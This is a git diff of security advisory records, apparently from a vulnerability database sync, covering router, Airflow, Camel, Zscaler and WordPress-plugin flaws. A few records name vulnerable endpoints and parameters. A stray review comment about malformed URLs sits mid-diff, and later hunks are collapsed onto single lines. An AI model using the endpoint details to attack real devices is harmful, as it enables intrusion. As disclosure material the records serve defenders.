+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27513"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.tendacn.com/product/F3"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.vulncheck.com/advisories/tenda-f3-csrf-in-web-management-interface"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-352"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-23T17:23:29Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-c3f3-cc42-xr9v/GHSA-c3f3-cc42-xr9v.json b/advisories/unreviewed/2026/02/GHSA-c3f3-cc42-xr9v/GHSA-c3f3-cc42-xr9v.json
index aff0817b94c65..381a0419c86d3 100644
--- a/advisories/unreviewed/2026/02/GHSA-c3f3-cc42-xr9v/GHSA-c3f3-cc42-xr9v.json
+++ b/advisories/unreviewed/2026/02/GHSA-c3f3-cc42-xr9v/GHSA-c3f3-cc42-xr9v.json
@@ -1,13 +1,18 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-c3f3-cc42-xr9v",
- "modified": "2026-02-23T12:31:29Z",
+ "modified": "2026-02-23T18:32:01Z",
 "published": "2026-02-23T09:31:23Z",
 "aliases": [
 "CVE-2026-23552"
 ],
 "details": "Cross-Realm Token Acceptance Bypass in KeycloakSecurityPolicy Apache Camel Keycloak component. \n\nThe Camel-Keycloak KeycloakSecurityPolicy does not validate the iss (issuer) claim of JWT tokens against the configured realm. A token issued by one Keycloak realm is silently accepted by a policy configured for a completely different realm, breaking tenant isolation.\nThis issue affects Apache Camel: from 4.15.0 before 4.18.0.\n\nUsers are recommended to upgrade to version 4.18.0, which fixes the issue.",
- "severity": [],
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N"
+ }
+ ],
 "affected": [],
 "references": [
 {
@@ -31,7 +36,7 @@
 "cwe_ids": [
 "CWE-346"
 ],
- "severity": null,
+ "severity": "CRITICAL",
 "github_reviewed": false,
 "github_reviewed_at": null,
 "nvd_published_at": "2026-02-23T09:17:00Z"
diff --git a/advisories/unreviewed/2026/02/GHSA-gfw7-2v73-69wg/GHSA-gfw7-2v73-69wg.json b/advisories/unreviewed/2026/02/GHSA-gfw7-2v73-69wg/GHSA-gfw7-2v73-69wg.json
index 573b55331f43f..cfbd574a16668 100644
--- a/advisories/unreviewed/2026/02/GHSA-gfw7-2v73-69wg/GHSA-gfw7-2v73-69wg.json
+++ b/advisories/unreviewed/2026/02/GHSA-gfw7-2v73-69wg/GHSA-gfw7-2v73-69wg.json
@@ -1,13 +1,18 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-gfw7-2v73-69wg",
- "modified": "2026-02-21T03:31:39Z",
+ "modified": "2026-02-23T18:32:01Z",
 "published": "2026-02-21T03:31:39Z",
 "aliases": [
 "CVE-2025-65995"
 ],
 "details": "When a DAG failed during parsing, Airflow’s error-reporting in the UI could include the full kwargs passed to the operators. If those kwargs contained sensitive values (such as secrets), they might be exposed in the UI tracebacks to authenticated users who had permission to view that DAG. \n\nThe issue has been fixed in Airflow 3.1.4 and 2.11.1, and users are strongly advised to upgrade to prevent potential disclosure of sensitive information.",
- "severity": [],
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N"
+ }
+ ],
 "affected": [],
 "references": [
 {
@@ -35,7 +40,7 @@
 "cwe_ids": [
 "CWE-209"
 ],
- "severity": null,
+ "severity": "MODERATE",
 "github_reviewed": false,
 "github_reviewed_at": null,
 "nvd_published_at": "2026-02-21T03:15:57Z"
diff --git a/advisories/unreviewed/2026/02/GHSA-h2mx-ppvp-v2rq/GHSA-h2mx-ppvp-v2rq.json b/advisories/unreviewed/2026/02/GHSA-h2mx-ppvp-v2rq/GHSA-h2mx-ppvp-v2rq.json
new file mode 100644
index 0000000000000..7be7206499ed6
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-h2mx-ppvp-v2rq/GHSA-h2mx-ppvp-v2rq.json
@@ -0,0 +1,37 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-h2mx-ppvp-v2rq",
+ "modified": "2026-02-23T18:32:02Z",
+ "published": "2026-02-23T18:32:02Z",
+ "aliases": [
+ "CVE-2025-70045"
+ ],
+ "details": "An issue pertaining to CWE-295: Improper Certificate Validation was discovered in jxcore jxm master. The application disables TLS/SSL certificate validation by setting 'rejectUnauthorized': false in HTTPS request options when 'jx_obj.IsSecure' is true",
+ "severity": [],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-70045"
+ },
+ {
+ "type": "WEB",
+ "url": "https://gist.github.com/zcxlighthouse/bd5852a409c97438016f2c476f8461d9"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/jxcore"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/jxcore/jxm"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [],
+ "severity": null,
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-23T16:29:36Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-jqx8-f6x9-hm34/GHSA-jqx8-f6x9-hm34.json b/advisories/unreviewed/2026/02/GHSA-jqx8-f6x9-hm34/GHSA-jqx8-f6x9-hm34.json
new file mode 100644
index 0000000000000..0ef084e5339c9
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-jqx8-f6x9-hm34/GHSA-jqx8-f6x9-hm34.json
@@ -0,0 +1,44 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-jqx8-f6x9-hm34",
+ "modified": "2026-02-23T18:32:02Z",
+ "published": "2026-02-23T18:32:02Z",
+ "aliases": [
+ "CVE-2026-27514"
+ ],
+ "details": "Shenzhen Tenda F3 Wireless Router firmware V12.01.01.55_multi contains a sensitive information exposure vulnerability in the configuration download functionality. The configuration download response includes the router password and administrative password in plaintext. The endpoint also omits appropriate Cache-Control directives, which can allow the response to be stored in client-side caches and recovered by other local users or processes with access to cached browser data.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N"
+ },
+ {
+ "type": "CVSS_V4",
+ "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"
+ }
+ ],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27514"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.tendacn.com/product/F3"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.vulncheck.com/advisories/tenda-f3-plaintext-credential-exposure-in-configuration-download"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-201"
+ ],
+ "severity": "HIGH",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-23T17:23:30Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-m575-4pr9-x5xr/GHSA-m575-4pr9-x5xr.json b/advisories/unreviewed/2026/02/GHSA-m575-4pr9-x5xr/GHSA-m575-4pr9-x5xr.json
new file mode 100644
index 0000000000000..ff72c80d8db22
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-m575-4pr9-x5xr/GHSA-m575-4pr9-x5xr.json
@@ -0,0 +1,44 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-m575-4pr9-x5xr",
+ "modified": "2026-02-23T18:32:02Z",
+ "published": "2026-02-23T18:32:02Z",
+ "aliases": [
+ "CVE-2025-70044"
+ ],
+ "details": "An issue pertaining to CWE-295: Improper Certificate Validation was discovered in fofolee uTools-quickcommand 5.0.3.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N"
+ }
+ ],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-70044"
+ },
+ {
+ "type": "WEB",
+ "url": "https://gist.github.com/zcxlighthouse/c00a0eef8ac41ec15ec43b75e2a2f7f8"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/fofolee"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/fofolee/uTools-quickcommand"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-295"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-23T16:29:36Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-mv94-7vf6-c5q6/GHSA-mv94-7vf6-c5q6.json b/advisories/unreviewed/2026/02/GHSA-mv94-7vf6-c5q6/GHSA-mv94-7vf6-c5q6.json
new file mode 100644
index 0000000000000..a41735bb7582a
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-mv94-7vf6-c5q6/GHSA-mv94-7vf6-c5q6.json
@@ -0,0 +1,56 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-mv94-7vf6-c5q6",
+ "modified": "2026-02-23T18:32:02Z",
+ "published": "2026-02-23T18:32:02Z",
+ "aliases": [
+ "CVE-2026-3015"
+ ],
+ "details": "A vulnerability was determined in UTT HiPER 810G up to 1.7.7-171114. Impacted is the function strcpy of the file /goform/formPolicyRouteConf. Executing a manipulation of the argument GroupName can lead to buffer overflow. The attack may be launched remotely. The exploit has been publicly disclosed and may be utilized.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
+ },
+ {
+ "type": "CVSS_V4",
+ "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"
+ }
+ ],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-3015"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/xhsy0314/CVEReport/blob/main/UTT-1/README.md"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/xhsy0314/CVEReport/blob/main/UTT-1/README.md#poc"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?ctiid.347375"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?id.347375"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?submit.756248"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-119"
+ ],
+ "severity": "HIGH",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-23T16:29:37Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-p76h-f4cx-3273/GHSA-p76h-f4cx-3273.json b/advisories/unreviewed/2026/02/GHSA-p76h-f4cx-3273/GHSA-p76h-f4cx-3273.json
new file mode 100644
index 0000000000000..53011e62a0d93
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-p76h-f4cx-3273/GHSA-p76h-f4cx-3273.json
@@ -0,0 +1,36 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-p76h-f4cx-3273",
+ "modified": "2026-02-23T18:32:02Z",
+ "published": "2026-02-23T18:32:02Z",
+ "aliases": [
+ "CVE-2026-22568"
+ ],
+ "details": "Improper neutralization of special elements in user-supplied input within the ZIA Admin UI could allow an authenticated administrator to access or retrieve unauthorized internal information in rare conditions.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:L/I:L/A:N"
+ }
+ ],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-22568"
+ },
+ {
+ "type": "WEB",
+ "url": "https://help.zscaler.com/zia/release-upgrade-summary-2026?applicable_category=zscaler.net&deployment_date=2026-02-12&id=1538576"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-20"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-23T17:23:29Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-pj4q-4jcg-hp2c/GHSA-pj4q-4jcg-hp2c.json b/advisories/unreviewed/2026/02/GHSA-pj4q-4jcg-hp2c/GHSA-pj4q-4jcg-hp2c.json
new file mode 100644
index 0000000000000..a39367ba49290
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-pj4q-4jcg-hp2c/GHSA-pj4q-4jcg-hp2c.json
@@ -0,0 +1,36 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-pj4q-4jcg-hp2c",
+ "modified": "2026-02-23T18:32:02Z",
+ "published": "2026-02-23T18:32:02Z",
+ "aliases": [
+ "CVE-2026-22567"
+ ],
+ "details": "Improper validation of user-supplied input in the ZIA Admin UI could allow an authenticated administrator to initiate backend functions through specific input fields in limited scenarios.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:L/A:N"
+ }
+ ],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-22567"
+ },
+ {
+ "type": "WEB",
+ "url": "https://help.zscaler.com/zia/release-upgrade-summary-2025?applicable_category=zscalertwo.net&deployment_date=2025-12-17&id=1538575"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-20"
+ ],
+ "severity": "HIGH",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-23T17:23:28Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-q4hc-vp2m-fr47/GHSA-q4hc-vp2m-fr47.json b/advisories/unreviewed/2026/02/GHSA-q4hc-vp2m-fr47/GHSA-q4hc-vp2m-fr47.json
new file mode 100644
index 0000000000000..63bddd81d06bb
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-q4hc-vp2m-fr47/GHSA-q4hc-vp2m-fr47.json
@@ -0,0 +1,40 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-q4hc-vp2m-fr47",
+ "modified": "2026-02-23T18:32:02Z",
+ "published": "2026-02-23T18:32:02Z",
+ "aliases": [
+ "CVE-2025-14905"
+ ],
+ "details": "A flaw was found in the 389-ds-base server. A heap buffer overflow vulnerability exists in the `schema_attr_enum_callback` function within the `schema.c` file. This occurs because the code incorrectly calculates the buffer size by summing alias string lengths without accounting for additional formatting characters. When a large number of aliases are processed, this oversight can lead to a heap overflow, potentially allowing a remote attacker to cause a Denial of Service (DoS) or achieve Remote Code Execution (RCE).",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H"
+ }
+ ],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-14905"
+ },
+ {
+ "type": "WEB",
+ "url": "https://access.redhat.com/security/cve/CVE-2025-14905"
+ },
+ {
+ "type": "WEB",
+ "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2423624"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-122"
+ ],
+ "severity": "HIGH",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-23T16:29:35Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-q6w4-grhv-wcp8/GHSA-q6w4-grhv-wcp8.json b/advisories/unreviewed/2026/02/GHSA-q6w4-grhv-wcp8/GHSA-q6w4-grhv-wcp8.json
new file mode 100644
index 0000000000000..44ccf0d02e7a2
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-q6w4-grhv-wcp8/GHSA-q6w4-grhv-wcp8.json
@@ -0,0 +1,44 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-q6w4-grhv-wcp8",
+ "modified": "2026-02-23T18:32:02Z",
+ "published": "2026-02-23T18:32:02Z",
+ "aliases": [
+ "CVE-2026-27511"
+ ],
+ "details": "Shenzhen Tenda F3 Wireless Router firmware V12.01.01.55_multi contains a clickjacking vulnerability in the web-based administrative interface. The interface does not set the X-Frame-Options header, allowing attacker-controlled sites to embed administrative pages in an iframe and trick an authenticated administrator into unintended interactions that may result in unauthorized configuration changes.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N"
+ },
+ {
+ "type": "CVSS_V4",
+ "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"
+ }
+ ],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27511"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.tendacn.com/product/F3"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.vulncheck.com/advisories/tenda-f3-clickjacking-in-web-management-interface"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-1021"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-23T17:23:29Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-vm54-j482-hx4h/GHSA-vm54-j482-hx4h.json b/advisories/unreviewed/2026/02/GHSA-vm54-j482-hx4h/GHSA-vm54-j482-hx4h.json
new file mode 100644
index 0000000000000..b5eede67eceee
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-vm54-j482-hx4h/GHSA-vm54-j482-hx4h.json
@@ -0,0 +1,44 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-vm54-j482-hx4h",
+ "modified": "2026-02-23T18:32:02Z",
+ "published": "2026-02-23T18:32:02Z",
+ "aliases": [
+ "CVE-2026-2698"
+ ],
+ "details": "An improper access control vulnerability exists where an authenticated user could access areas outside of their authorized scope.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N"
+ },
+ {
+ "type": "CVSS_V4",
+ "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"
+ }
+ ],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2698"
+ },
+ {
+ "type": "WEB",
+ "url": "https://https://docs.tenable.com/release-notes/Content/security-center/2026.htm"
+ },
+ {
+ "type": "WEB",
+ "url": "https://https://www.tenable.com/security/tns-2026-07"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-639"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-23T17:23:30Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-xfxx-38qx-mrf4/GHSA-xfxx-38qx-mrf4.json b/advisories/unreviewed/2026/02/GHSA-xfxx-38qx-mrf4/GHSA-xfxx-38qx-mrf4.json
index 8530d1187e7be..5756ac5f3acba 100644
--- a/advisories/unreviewed/2026/02/GHSA-xfxx-38qx-mrf4/GHSA-xfxx-38qx-mrf4.json
+++ b/advisories/unreviewed/2026/02/GHSA-xfxx-38qx-mrf4/GHSA-xfxx-38qx-mrf4.json
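Review bot: Both Tenable reference URLs in this record carry a doubled scheme, `https://https://docs.tenable.com/...` and `https://https://www.tenable.com/security/tns-2026-07`, so the vendor advisory links will not resolve as written and link checkers or enrichment jobs that follow them will fail. They should read `"url": "https://docs.tenable.com/release-notes/Content/security-center/2026.htm"` and `"url": "https://www.tenable.com/security/tns-2026-07"`. The `details` text also never names the affected product; the reference paths suggest Tenable Security Center, but that should be confirmed against the vendor advisory before it is added.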
@@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-xfxx-38qx-mrf4", - "modified": "2026-02-20T18:31:38Z", + "modified": "2026-02-23T18:31:56Z", "published": "2026-02-20T18:31:38Z", "aliases": [ "CVE-2026-22357" ], "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Spencer Haws Link Whisper Free link-whisper allows Reflected XSS.This issue affects Link Whisper Free: from n/a through <= 0.9.0.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L" + } + ], "affected": [], "references": [ { @@ -23,7 +28,7 @@ "cwe_ids": [ "CWE-79" ], - "severity": null, + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-20T16:22:34Z" From 8bd7c1f46419afedac4dba9e54177e6b9fc2d80c Mon Sep 17 00:00:00 2001 
From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Mon, 23 Feb 2026 21:32:40 +0000 Subject: [PATCH 55/77] Advisory Database Sync --- .../GHSA-56x4-vcv9-c6cw.json | 6 ++- .../GHSA-5p74-h2ww-pwhx.json | 6 ++- .../GHSA-g8pv-w9gq-24x8.json | 7 ++- .../GHSA-mrj4-3c4j-jh3r.json | 6 ++- .../GHSA-mx39-grv7-hq6w.json | 6 ++- .../GHSA-3f33-44xm-29m7.json | 4 +- .../GHSA-42h9-mr3g-6gc2.json | 15 ++++-- .../GHSA-438c-878c-qvmf.json | 15 ++++-- .../GHSA-4phc-m7h5-frwr.json | 44 ++++++++++++++++ .../GHSA-5fqg-ph33-v8fc.json | 40 ++++++++++++++ .../GHSA-5jj2-qhxw-rpq6.json | 37 +++++++++++++ .../GHSA-6235-7hp8-952p.json | 52 +++++++++++++++++++ .../GHSA-6v87-78cw-pw29.json | 11 ++-- .../GHSA-6x8c-24f7-p33h.json | 11 ++-- .../GHSA-744p-mq95-2m92.json | 11 ++-- .../GHSA-74m2-9pf8-f794.json | 6 ++- .../GHSA-75j9-8g79-fp7r.json | 44 ++++++++++++++++ .../GHSA-7mg3-vfc7-xvch.json | 40 ++++++++++++++ .../GHSA-8gq5-mm3m-7h4x.json | 11 ++-- .../GHSA-8p85-wjp4-3w4m.json | 15 ++++-- .../GHSA-8x43-j6j7-q6vg.json | 15 ++++-- .../GHSA-9636-r3rx-jw83.json | 6 ++- .../GHSA-c4qg-fgx5-7xg5.json | 15 ++++-- .../GHSA-cf6f-74jc-gm3q.json | 4 +- .../GHSA-f565-6pjw-3whr.json | 15 ++++-- .../GHSA-f8w4-9vp9-7v2q.json | 37 +++++++++++++ .../GHSA-fqqc-4836-hph4.json | 40 ++++++++++++++ .../GHSA-fqrw-hvqv-r58w.json | 15 ++++-- .../GHSA-h2mx-ppvp-v2rq.json | 15 ++++-- .../GHSA-h4x3-hcxh-84cx.json | 40 ++++++++++++++ .../GHSA-h93r-xq5m-hv3w.json | 15 ++++-- .../GHSA-jqhg-j5gv-hpmr.json | 33 ++++++++++++ .../GHSA-m6xw-mq4p-x7xv.json | 45 ++++++++++++++++ .../GHSA-p5gf-vhgm-432f.json | 11 ++-- .../GHSA-p884-v7p5-5858.json | 37 +++++++++++++ .../GHSA-p8m9-mjw8-hvvx.json | 3 +- .../GHSA-p9m7-fwrr-649p.json | 33 ++++++++++++ .../GHSA-pc7w-r272-4xgr.json | 48 +++++++++++++++++ .../GHSA-pfgm-6983-f589.json | 15 ++++-- .../GHSA-pfjc-cfqc-87f5.json | 48 +++++++++++++++++ .../GHSA-pp46-7w92-4xvf.json | 3 +- .../GHSA-q8wg-gw6g-8c93.json | 15 ++++-- 
.../GHSA-qg32-r7gw-fcxw.json | 52 +++++++++++++++++++ .../GHSA-qqj5-wp73-78fr.json | 11 ++-- .../GHSA-r222-jjm5-r49x.json | 31 +++++++++++ .../GHSA-r4m5-gc42-8vvh.json | 6 ++- .../GHSA-rp93-gq4p-8r62.json | 11 ++-- .../GHSA-vq94-wmm9-737m.json | 11 ++-- .../GHSA-w2hw-vq92-cm3x.json | 11 ++-- .../GHSA-wqcv-67x3-mx26.json | 11 ++-- .../GHSA-xf4f-qj26-72pf.json | 15 ++++-- 51 files changed, 964 insertions(+), 90 deletions(-) create mode 100644 advisories/unreviewed/2026/02/GHSA-4phc-m7h5-frwr/GHSA-4phc-m7h5-frwr.json create mode 100644 advisories/unreviewed/2026/02/GHSA-5fqg-ph33-v8fc/GHSA-5fqg-ph33-v8fc.json create mode 100644 advisories/unreviewed/2026/02/GHSA-5jj2-qhxw-rpq6/GHSA-5jj2-qhxw-rpq6.json create mode 100644 advisories/unreviewed/2026/02/GHSA-6235-7hp8-952p/GHSA-6235-7hp8-952p.json create mode 100644 advisories/unreviewed/2026/02/GHSA-75j9-8g79-fp7r/GHSA-75j9-8g79-fp7r.json create mode 100644 advisories/unreviewed/2026/02/GHSA-7mg3-vfc7-xvch/GHSA-7mg3-vfc7-xvch.json create mode 100644 advisories/unreviewed/2026/02/GHSA-f8w4-9vp9-7v2q/GHSA-f8w4-9vp9-7v2q.json create mode 100644 advisories/unreviewed/2026/02/GHSA-fqqc-4836-hph4/GHSA-fqqc-4836-hph4.json create mode 100644 advisories/unreviewed/2026/02/GHSA-h4x3-hcxh-84cx/GHSA-h4x3-hcxh-84cx.json create mode 100644 advisories/unreviewed/2026/02/GHSA-jqhg-j5gv-hpmr/GHSA-jqhg-j5gv-hpmr.json create mode 100644 advisories/unreviewed/2026/02/GHSA-m6xw-mq4p-x7xv/GHSA-m6xw-mq4p-x7xv.json create mode 100644 advisories/unreviewed/2026/02/GHSA-p884-v7p5-5858/GHSA-p884-v7p5-5858.json create mode 100644 advisories/unreviewed/2026/02/GHSA-p9m7-fwrr-649p/GHSA-p9m7-fwrr-649p.json create mode 100644 advisories/unreviewed/2026/02/GHSA-pc7w-r272-4xgr/GHSA-pc7w-r272-4xgr.json create mode 100644 advisories/unreviewed/2026/02/GHSA-pfjc-cfqc-87f5/GHSA-pfjc-cfqc-87f5.json create mode 100644 advisories/unreviewed/2026/02/GHSA-qg32-r7gw-fcxw/GHSA-qg32-r7gw-fcxw.json create mode 100644 
advisories/unreviewed/2026/02/GHSA-r222-jjm5-r49x/GHSA-r222-jjm5-r49x.json diff --git a/advisories/unreviewed/2025/12/GHSA-56x4-vcv9-c6cw/GHSA-56x4-vcv9-c6cw.json b/advisories/unreviewed/2025/12/GHSA-56x4-vcv9-c6cw/GHSA-56x4-vcv9-c6cw.json index a0ca7187a4332..77b719f6b6382 100644 --- a/advisories/unreviewed/2025/12/GHSA-56x4-vcv9-c6cw/GHSA-56x4-vcv9-c6cw.json +++ b/advisories/unreviewed/2025/12/GHSA-56x4-vcv9-c6cw/GHSA-56x4-vcv9-c6cw.json @@ -1,13 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-56x4-vcv9-c6cw", - "modified": "2025-12-09T21:31:49Z", + "modified": "2026-02-23T21:31:22Z", "published": "2025-12-09T21:31:49Z", "aliases": [ "CVE-2021-47729" ], "details": "Selea Targa IP OCR-ANPR Camera contains a stored cross-site scripting vulnerability in the 'files_list' parameter that allows attackers to inject malicious HTML and script code. Attackers can send a POST request to /cgi-bin/get_file.php with crafted payload to execute arbitrary scripts in victim's browser session.", "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N" + }, { "type": "CVSS_V4", "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" diff --git a/advisories/unreviewed/2025/12/GHSA-5p74-h2ww-pwhx/GHSA-5p74-h2ww-pwhx.json 